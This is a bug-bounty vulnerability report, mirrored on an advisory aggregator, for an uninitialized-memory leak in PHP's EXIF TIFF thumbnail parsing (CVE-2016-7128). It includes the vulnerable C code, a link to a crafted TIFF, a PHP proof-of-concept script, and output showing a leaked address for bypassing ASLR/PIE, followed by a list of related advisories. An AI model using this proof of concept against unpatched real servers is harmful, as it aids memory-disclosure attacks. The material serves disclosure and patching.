Lucene search
HoangnguyenH1:160294HistoryAug 18, 2016 - 1:06 a.m.
Internet Bug Bounty: Memory Leakage In exif_process_IFD_in_TIFF (CVE-2016-7128)
2016-08-1801:06:22
hoangnguyen
hackerone.com
38
0.005 Low
EPSS
Percentile
75.3%
I found some vulnerable code that leads to the memory leak in exif_process_IFD_in_TIFF. Let take look at code chunk :
if (!ImageInfo->Thumbnail.data && ImageInfo->Thumbnail.offset && ImageInfo->Thumbnail.size && ImageInfo->read_thumbnail) {
ImageInfo->Thumbnail.data = safe_emalloc(ImageInfo->Thumbnail.size, 1, 0);
php_stream_seek(ImageInfo->infile, ImageInfo->Thumbnail.offset, SEEK_SET);
fgot = php_stream_read(ImageInfo->infile, ImageInfo->Thumbnail.data, ImageInfo->Thumbnail.size);
if (fgot < ImageInfo->Thumbnail.size) {
EXIF_ERRLOG_THUMBEOF(ImageInfo)
}
exif_thumbnail_build(ImageInfo);
}
Because lack of checking ImageInfo->Thumbnail.offset if an attack set ImageInfo->Thumbnail.offset larger than ImageInfo->FileSize then php_stream_read return 0 to fgot, because EXIF_ERRLOG_THUMBEOF was defined as :
#define EXIF_ERRLOG_THUMBEOF(ImageInfo) exif_error_docref(NULL EXIFERR_CC, ImageInfo, E_WARNING, "%s", EXIF_ERROR_THUMBEOF);
As you can see there is no exit after this error is output.
After that exif_thumbnail_build(ImageInfo) is called. Because this thumbnail I applied is IMAGE_FILETYPE_JPEG so exif_thumbnail_build will return without error.
Finally ImageInfo->Thumbnail.data is no fill by user data that lead to information leak like below, an attacker can leak address and then use it to bypass some protection such as PIE, ASLR,…
Here the tiff file : https://drive.google.com/open?id=0B0D1DYQpkA9UVGE5QlJaNnIxb1E
Affect : Linux, Mac Os X,Windows
Test script:
<?php
$exif = exif_read_data(‘exif/gen.tiff’,0,0,true);
var_dump($exif);
$thumb = $exif['THUMBNAIL']['THUMBNAIL'];
echo bin2hex($thumb);
?>
Actual result:
$./php exif.php
Warning: exif_read_data(gen.tiff): Thumbnail goes IFD boundary or end of file reached in /vagrant_extend/audit/exif.php on line 2
Warning: exif_read_data(gen.tiff): Error in TIFF: filesize(x04E2) less than start of IFD dir(x829A0004) in /vagrant_extend/audit/exif.php on line 2
array(11) {
["FileName"]=>
string(8) "gen.tiff"
["FileDateTime"]=>
int(1468986539)
["FileSize"]=>
int(1250)
["FileType"]=>
int(7)
["MimeType"]=>
string(10) "image/tiff"
["SectionsFound"]=>
string(30) "ANY_TAG, IFD0, THUMBNAIL, EXIF"
["COMPUTED"]=>
array(10) {
["html"]=>
string(24) "width="128" height="132""
["Height"]=>
int(132)
["Width"]=>
int(128)
["IsColor"]=>
int(0)
["ByteOrderMotorola"]=>
int(0)
["ApertureFNumber"]=>
string(5) "f/1.0"
["Thumbnail.FileType"]=>
int(2)
["Thumbnail.MimeType"]=>
string(10) "image/jpeg"
["Thumbnail.Height"]=>
int(132)
["Thumbnail.Width"]=>
int(128)
}
["XResolution"]=>
string(21) "1414812756/1414812756"
["THUMBNAIL"]=>
array(5) {
["ImageWidth"]=>
int(128)
["ImageLength"]=>
int(132)
["JPEGInterchangeFormat"]=>
int(1280)
["JPEGInterchangeFormatLength"]=>
int(200)
["THUMBNAIL"]=>
string(200) "" # leak leak
}
["ExposureTime"]=>
string(21) "1414812756/1414812756"
["FNumber"]=>
string(21) "1414812756/1414812756"
}
00c2a7081e7f000000000.... => leak leak (00c2a7081e7f => 0x7f1e08a7c200)
Bug here : https://bugs.php.net/bug.php?id=72627
Related
prion
prion
Code injection
2016-09-12 01:59:00
redhatcve
redhatcve
CVE-2016-7128
2016-09-09 13:19:19
debiancve
debiancve
CVE-2016-7128
2016-09-12 01:59:00
nvd
nvd
CVE-2016-7128
2016-09-12 01:59:06
ubuntucve
ubuntucve
CVE-2016-7128
2016-09-11 00:00:00
cvelist
cvelist
CVE-2016-7128
2016-09-12 01:00:00
cve
cve
CVE-2016-7128
2016-09-12 01:59:06
f5
f5
K30216728 : Multiple PHP vulnerabilities
2016-11-02 00:00:00
SOL30216728 - Multiple PHP vulnerabilities
2016-11-01 00:00:00
nessus
nessus
PHP 5.6.x < 5.6.25 Multiple Vulnerabilities
2016-08-23 00:00:00
Tenable SecurityCenter PHP < 5.6.25 Multiple Vulnerabilities (TNS-2016-09)
2017-06-26 00:00:00
Slackware 14.0 / 14.1 / 14.2 / current : php (SSA:2016-252-01)
2016-09-09 00:00:00
openvas
openvas
PHP Multiple Vulnerabilities - 02 (Sep 2016) - Windows
2016-09-12 00:00:00
PHP Multiple Vulnerabilities - 02 (Sep 2016) - Linux
2016-09-12 00:00:00
openSUSE: Security Advisory for php5 (openSUSE-SU-2016:2337-1)
2016-09-20 00:00:00
suse
suse
Security update for php5 (important)
2016-09-19 19:09:23
Security update for php53 (important)
2016-10-05 18:12:21
Security update for php53 (important)
2016-09-16 21:09:09
slackware
slackware
[slackware-security] php
2016-09-08 22:38:27
ibm
ibm
debian
debian
[SECURITY] [DLA 749-1] php5 security update
2016-12-16 21:48:18
[SECURITY] [DSA 3689-1] php5 security update
2016-10-08 13:53:04
[SECURITY] [DSA 3689-1] php5 security update
2016-10-08 13:53:04
osv
osv
php5 - security update
2016-12-16 00:00:00
cloudfoundry
cloudfoundry
USN-3095-1 PHP vulnerabilities | Cloud Foundry
2016-10-04 00:00:00
ubuntu
ubuntu
PHP vulnerabilities
2016-10-04 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2016-11-30 00:00:00
cloudlinux
cloudlinux
Fix of 227 CVE
2020-10-15 12:00:00
veracode
veracode
Arbitrary Code Execution
2019-05-02 06:02:18
Denial Of Service (DoS) Through Memory Corruption
2019-05-02 06:02:24
Arbitrary Code Execution
2019-05-02 06:02:23
redhat
redhat
rosalinux
rosalinux
Advisory ROSA-SA-2021-1950
2021-07-02 17:57:45